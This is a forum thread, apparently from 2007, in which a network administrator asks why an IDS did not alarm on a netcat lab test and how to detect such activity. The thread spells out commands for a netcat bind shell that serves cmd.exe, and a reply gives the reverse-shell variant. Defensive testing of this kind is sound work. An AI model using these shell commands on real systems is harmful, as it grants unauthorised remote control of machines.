09-13-2007 12:22 PM - edited 03-10-2019 03:47 AM
I am doing the following lab testing:
nc ?v ?l ?e cmd.exe ?p 565
Attacker:
nc ?v .x.x.x.x 565
I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?
Any help is highly appreciated.
09-13-2007 12:23 PM
***
nc -v -l -e cmd.exe -p 565
Attacker:
nc -v .x.x.x.x 565
09-14-2007 09:29 AM
You are using netcat to setup a listener on port 565 and asking it to execute cmd.exe when a client connects. It doesn't actually send "cmd.exe" to the client, it redirects STDIN and STDOUT to the client.
To trigger your signature, setup the listener without a "-e" command. Have the client use "-e cmd.exe" when connecting.
09-14-2007 09:59 AM
Got it! But, as a matter of fact my doubt was:
Can IDS sensors detect netcat activity on the network? Does the netcat operates in a RFC TCP standards and therefore it is seen as normal traffic?
09-14-2007 10:05 AM
Not reliably AFAIK. It's not like telnet or ftp that tend to use specific ports or have application RFC's. With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection). I haven't played with that much yet myself.
09-14-2007 10:31 AM
Thanks Matt! I'll try to update the sensor and play with that then.
Discover and save your favorite ideas. Come back to expert answers, step-by-step guides, recent topics, and more.
New here? Get started with these tips. How to use Community New member guide